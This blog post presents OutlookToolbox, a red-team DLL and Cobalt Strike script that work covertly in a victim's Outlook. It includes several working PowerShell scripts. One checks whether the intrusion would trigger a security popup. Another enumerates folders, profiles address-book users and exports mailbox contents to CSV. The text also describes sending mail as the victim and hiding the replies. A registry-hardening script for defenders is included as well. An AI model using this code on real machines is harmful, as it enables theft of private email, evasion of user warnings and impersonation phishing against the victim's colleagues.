OutlookToolbox

Hey all,

Lately I’ve been neglecting my CTF posts so I could put some time into OutlookToolbox, a C# DLL that uses COM to target Outlook in the background.  Additionally, I put together a Cobalt Strike Aggressor script to assist with the execution of OutlookToolbox,  both of which can be found at the repository here – https://github.com/ThunderGunExpress/OutlookToolbox.

This is a quick and dirty post which will cover the features.  Later, I plan on creating another post which further explores potential use cases of OutlookToolbox.

Mandatory

  • Only use for good.
  • I have not done extensive testing with this tool; use at your own risk. I recommend testing OutlookToolbox on a replica of your target first.
  • The Aggressor script uses several brm (file and/or directory remove) function calls which can bulldoze entire directories if input is not sanitized correctly. I’ve tried to iron out all the issues, but still, I would put OutlookToolbox in a non-critical directory like C:\Users\Public\Documents just to be safe.

What it Does

  • Lists folders in Outlook (Inbox, Sent Items, Conversation History, Joe’s Custom Folder … )
  • Exports a target folder to a CSV file
  • Enumerates targets using the GAL
  • Downloads specific messages
  • Sends an email on behalf of the target user

How to Prevent

Configure Outlook’s programmatic access security (Trust Center > Programmatic Access, the ObjectModelGuard setting that the sanity check below looks for) to warn about suspicious activity – MS link.  Email encryption will break several of these functions, which is not a bad thing.
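As an added example (not code from OutlookToolbox or its repository), the following PowerShell audits the registry values behind the Programmatic Access page and, with -Harden, moves them to the "warn" posture suggested above. It assumes the Office 16.0 registry version (Outlook 2016/2019/Microsoft 365) and the value meanings Microsoft documents for ObjectModelGuard, AdminSecurityMode and the PromptOOM* policy values; verify both against the Microsoft documentation for your build before pushing anything via GPO.

```powershell
# Added example (not part of OutlookToolbox): audit the registry values behind
# Outlook's Trust Center > Programmatic Access page and, with -Harden, move them
# to the "warn" posture recommended above.
# Assumptions: Office registry version 16.0 (Outlook 2016/2019/Microsoft 365) and
# the value meanings Microsoft documents for these settings; verify both against
# the Microsoft documentation for your build before deploying via GPO.
param(
    [string]$OfficeVersion = '16.0',
    [switch]$Harden
)

$UserKey   = "HKCU:\Software\Microsoft\Office\$OfficeVersion\Outlook\Security"
$PolicyKey = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\Outlook\Security"

# ObjectModelGuard is the radio button on the Programmatic Access page.
$GuardMeaning = @{
    0 = 'warn only when antivirus is inactive or out of date (default)'
    1 = 'always warn'
    2 = 'never warn (weak: silent Object Model access)'
}
# Per-action prompts, honoured once AdminSecurityMode = 3 (Group Policy mode).
# 0 = prompt user, 1 = automatically approve (weak), 2 = automatically deny.
$PromptMeaning = @{ 0 = 'prompt user'; 1 = 'automatically approve (weak)'; 2 = 'automatically deny' }
$OomPrompts = @(
    'PromptOOMSend',                      # sending mail
    'PromptOOMAddressBookAccess',         # reading the address book / GAL
    'PromptOOMAddressInformationAccess',  # reading sender and recipient addresses
    'PromptOOMSaveAs'                     # saving items to disk
)

function Get-RegValue([string]$Path, [string]$Name) {
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { $null } else { $item.$Name }
}

function Get-OutlookOomPosture {
    $posture = [ordered]@{}
    $guard = Get-RegValue $UserKey 'ObjectModelGuard'
    if ($null -eq $guard) { $guard = 0 }                      # absent = Outlook default
    $posture.ObjectModelGuard = "$guard = $($GuardMeaning[[int]$guard])"
    $mode = Get-RegValue $PolicyKey 'AdminSecurityMode'
    $modeText = 'not set (Outlook default security; PromptOOM* policy values not applied)'
    if ($null -ne $mode) { $modeText = $mode }
    $posture.AdminSecurityMode = $modeText
    foreach ($name in $OomPrompts) {
        $v = Get-RegValue $PolicyKey $name
        $text = 'not set'
        if ($null -ne $v) { $text = "$v = $($PromptMeaning[[int]$v])" }
        $posture[$name] = $text
    }
    [pscustomobject]$posture
}

function Set-OutlookOomHardening {
    # HKCU\Software\Policies is admin-writable only; in production push these via GPO.
    New-Item -Path $PolicyKey -Force | Out-Null
    New-Item -Path $UserKey   -Force | Out-Null
    Set-ItemProperty -Path $PolicyKey -Name 'AdminSecurityMode' -Value 3 -Type DWord
    foreach ($name in $OomPrompts) {
        Set-ItemProperty -Path $PolicyKey -Name $name -Value 0 -Type DWord   # prompt user
    }
    Set-ItemProperty -Path $UserKey -Name 'ObjectModelGuard' -Value 1 -Type DWord  # always warn
}

Get-OutlookOomPosture | Format-List
if ($Harden) {
    Set-OutlookOomHardening
    Get-OutlookOomPosture | Format-List
}
```

Run it once without -Harden to see the current posture; a machine showing ObjectModelGuard = 2 or any PromptOOM* value of 1 is exactly what a tool like OutlookToolbox hopes to find, because the Object Model calls then never produce a prompt.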


Cobalt Strike Aggressor Script

The following are screen captures of the Cobalt Strike Aggressor script that is in the GitHub repository.  The script is not required; an external application or rundll32 can be used instead.

Note that the script can be a bit buggy since I used beacon_output_alt to handle completion of downloads.


Upload OutlookToolbox DLL

This menu option will ask the user for the local location of the OutlookToolbox DLL.  It will upload the specified file to $targetDir, a global variable in the script which is currently configured to C:\Users\Public\Documents\ … do not change this to a critical directory like C:\ or C:\Windows\System32\, see the note about brm above.  Once the upload is complete it will rename the file to OutlookToolbox.dll.


Delete OutlookToolbox DLL


Sample Sanity

This menu option calls the SanityCheck function, which tests for configurations that might cause a popup on the target machine.  It checks the following:

  • Outlook is installed
  • Outlook is running (anything but 1 instance of Outlook.exe will cause OutlookToolbox.dll to stop)
  • ObjectModelGuard registry key
    • If Outlook is relying on AV, OutlookToolbox will check the status of AV and ensure it is up-to-date and enabled … funny, eh?
  • Checks that the process (Cobalt session) calling rundll32 is the same integrity level as Outlook.exe
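As an added example (not OutlookToolbox's own code), here is a PowerShell pre-flight in the spirit of the SanityCheck function, to be run in the same user context that will later load the DLL. Assumptions: the Office 16.0 registry version; the root/SecurityCenter2 productState decoding follows the commonly used but undocumented byte layout; and the integrity-level check is an approximation that only flags an elevated caller, since Outlook normally runs at medium integrity (a precise check would read the mandatory label from both process tokens).

```powershell
# Added example (not part of OutlookToolbox): a pre-flight check in the spirit
# of the SanityCheck function described above.
# Assumptions: Office key 16.0; productState decoding for root/SecurityCenter2
# follows the commonly used (undocumented) layout; the integrity check is an
# approximation that only detects an elevated caller, since Outlook normally
# runs at medium integrity.
param([string]$OfficeVersion = '16.0')

function Test-OutlookPreflight {
    $result = [ordered]@{}

    # 1. Outlook installed: the COM ProgID the DLL would CoCreate must be registered.
    $result.Installed = Test-Path 'Registry::HKEY_CLASSES_ROOT\Outlook.Application\CLSID'

    # 2. Exactly one outlook.exe: zero means COM would have to launch a new process
    #    (noisy), two or more means the COM call may bind to the wrong one.
    $procs = @(Get-Process -Name outlook -ErrorAction SilentlyContinue)
    $result.OutlookInstances = $procs.Count
    $result.SingleInstance   = ($procs.Count -eq 1)

    # 3. ObjectModelGuard: 2 = never warn (silent); 1 = always warn (popup);
    #    0 or absent = warn only if antivirus is inactive or out of date.
    $key   = "HKCU:\Software\Microsoft\Office\$OfficeVersion\Outlook\Security"
    $guard = (Get-ItemProperty -Path $key -Name ObjectModelGuard -ErrorAction SilentlyContinue).ObjectModelGuard
    if ($null -eq $guard) { $guard = 0 }
    $result.ObjectModelGuard = $guard

    # 4. When the guard defers to AV (0), a healthy AV product means no popup.
    $avHealthy = $false
    if ($guard -eq 0) {
        $av = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue
        foreach ($p in $av) {
            $state    = [int]$p.productState
            $enabled  = ((($state -shr 8) -band 0xFF) -band 0x10) -ne 0   # scanner byte: 0x10 = on
            $upToDate = (($state -band 0xFF) -band 0x10) -eq 0             # definition byte: 0x10 = out of date
            if ($enabled -and $upToDate) { $avHealthy = $true }
            $result["AV:$($p.displayName)"] = "enabled=$enabled upToDate=$upToDate"
        }
    }
    $expectPopup = switch ($guard) { 1 { $true } 2 { $false } default { -not $avHealthy } }
    $result.ExpectPopup = $expectPopup

    # 5. Integrity: an elevated caller cannot attach to a medium-integrity Outlook via COM.
    $id       = [Security.Principal.WindowsIdentity]::GetCurrent()
    $elevated = ([Security.Principal.WindowsPrincipal]$id).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $result.CallerElevated = $elevated
    if ($procs.Count -eq 1) {
        $wmi   = Get-CimInstance Win32_Process -Filter "ProcessId = $($procs[0].Id)"
        $owner = Invoke-CimMethod -InputObject $wmi -MethodName GetOwner
        $result.OutlookOwner = "$($owner.Domain)\$($owner.User)"
        $result.SameUser     = ($result.OutlookOwner -eq $id.Name)
    }

    $result.Go = $result.Installed -and $result.SingleInstance -and (-not $expectPopup) -and (-not $elevated)
    [pscustomobject]$result
}

Test-OutlookPreflight | Format-List
```

Go is only true when all five conditions line up; if ExpectPopup is true, either the guard is set to always warn or the AV product is off or stale, and any Object Model call will raise the Trust Center prompt on the user's screen.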


Enumerate Folders

Enumerates Outlook’s folders and the number of items in each.


Enumerate Target

Gather information about target user using the GAL.  This can be used in conjunction with EmailPivot to increase the authenticity of an internal phish.


Folder To CSV

Exports the target folder to a CSV file.  Body length is truncated to keep the size down.  This Cobalt Strike function uses sleep, so it will seem like CS has hung; just wait it out.
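To show what the three read-only operations above (Enumerate Folders, Enumerate Target, Folder To CSV) look like against the Outlook Object Model, here is an added PowerShell example that is not OutlookToolbox's code. It attaches to the running Outlook through COM (or starts one if none is running), so it has to run under the same user and integrity level; the folder path syntax is Outlook's own FolderPath format, while the default body truncation length, the CSV columns and the GAL fields shown are my choices.

```powershell
# Added example (not OutlookToolbox's code): folder enumeration, GAL lookup and
# folder-to-CSV export through the Outlook Object Model from PowerShell.
# Assumptions: Outlook is installed and running under this user; FolderPath
# values look like '\\mailbox@corp.example\Inbox'; BodyChars and the fields
# exported are this example's choices, not OutlookToolbox's.
param(
    [string]$FolderPath = '',                  # empty = default Inbox
    [string]$CsvPath    = "$env:TEMP\folder.csv",
    [int]$BodyChars     = 200,
    [string]$GalTarget  = ''                   # display name or SMTP address to resolve
)

$Outlook = New-Object -ComObject Outlook.Application
$Ns      = $Outlook.GetNamespace('MAPI')

# Recursively report every subfolder with its item count (Enumerate Folders).
function Get-OutlookFolderTree {
    param($Folder, [int]$Depth = 0)
    foreach ($f in $Folder.Folders) {
        [pscustomobject]@{ Path = $f.FolderPath; Items = $f.Items.Count; Depth = $Depth }
        Get-OutlookFolderTree -Folder $f -Depth ($Depth + 1)
    }
}

function Get-AllFolders {
    foreach ($store in $Ns.Folders) {          # one entry per mailbox / PST store
        [pscustomobject]@{ Path = $store.FolderPath; Items = $store.Items.Count; Depth = 0 }
        Get-OutlookFolderTree -Folder $store -Depth 1
    }
}

# Resolve a FolderPath to a folder object; fall back to the Inbox (olFolderInbox = 6).
function Resolve-OutlookFolder([string]$Path) {
    if (-not $Path) { return $Ns.GetDefaultFolder(6) }
    $parts = $Path.TrimStart('\') -split '\\'
    $node  = $Ns.Folders.Item($parts[0])
    foreach ($p in ($parts | Select-Object -Skip 1)) { $node = $node.Folders.Item($p) }
    $node
}

# Look up one user in the GAL (Enumerate Target): resolve the name, then read the
# Exchange attributes and reporting line.
function Get-OutlookGalUser([string]$Target) {
    $rcpt = $Ns.CreateRecipient($Target)
    if (-not $rcpt.Resolve()) { throw "Could not resolve '$Target' against the address book" }
    $user = $rcpt.AddressEntry.GetExchangeUser()
    if ($null -eq $user) { throw "'$Target' is not an Exchange user" }
    $mgr = $user.GetExchangeUserManager()
    $managerName = ''
    if ($null -ne $mgr) { $managerName = $mgr.Name }
    [pscustomobject]@{
        Name       = $user.Name
        Smtp       = $user.PrimarySmtpAddress
        Title      = $user.JobTitle
        Department = $user.Department
        Office     = $user.OfficeLocation
        Phone      = $user.BusinessTelephoneNumber
        Manager    = $managerName
        Reports    = @($user.GetDirectReports() | ForEach-Object { $_.Name }) -join '; '
    }
}

# Export message metadata plus a truncated body (Folder To CSV). Reading
# SenderEmailAddress is one of the calls the Object Model guard watches.
function Export-OutlookFolderCsv([string]$Path, [string]$Out, [int]$MaxBody) {
    $folder = Resolve-OutlookFolder $Path
    $rows = foreach ($item in $folder.Items) {
        if ($item.Class -ne 43) { continue }    # 43 = olMail; skip reports, meeting items, etc.
        $body = [string]$item.Body
        if ($body.Length -gt $MaxBody) { $body = $body.Substring(0, $MaxBody) + '...' }
        [pscustomobject]@{
            Received  = $item.ReceivedTime
            From      = $item.SenderEmailAddress
            To        = $item.To
            Subject   = $item.Subject
            HasAttach = ($item.Attachments.Count -gt 0)
            Body      = ($body -replace '\r?\n', ' ')
        }
    }
    $rows | Export-Csv -Path $Out -NoTypeInformation -Encoding UTF8
    "$(@($rows).Count) messages written to $Out"
}

Get-AllFolders | Format-Table -AutoSize
if ($GalTarget) { Get-OutlookGalUser $GalTarget | Format-List }
Export-OutlookFolderCsv -Path $FolderPath -Out $CsvPath -MaxBody $BodyChars
```

Every one of these calls goes through the same Outlook.Application COM server the DLL uses, so whether the user sees a prompt depends entirely on the ObjectModelGuard and AV state covered in the sanity check, not on the language the caller is written in.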


Download Message

Downloads a single message if using index, or can download a collection of emails sent by a specified user.  If downloading several emails, OutlookToolbox will zip the contents before downloading.


Email Pivot

Sends an email on behalf of the target user using a specified .msg file.  Email Pivot can also create an Outlook rule to mute replies from the target recipients.  Note that there is currently no function to remove rules.

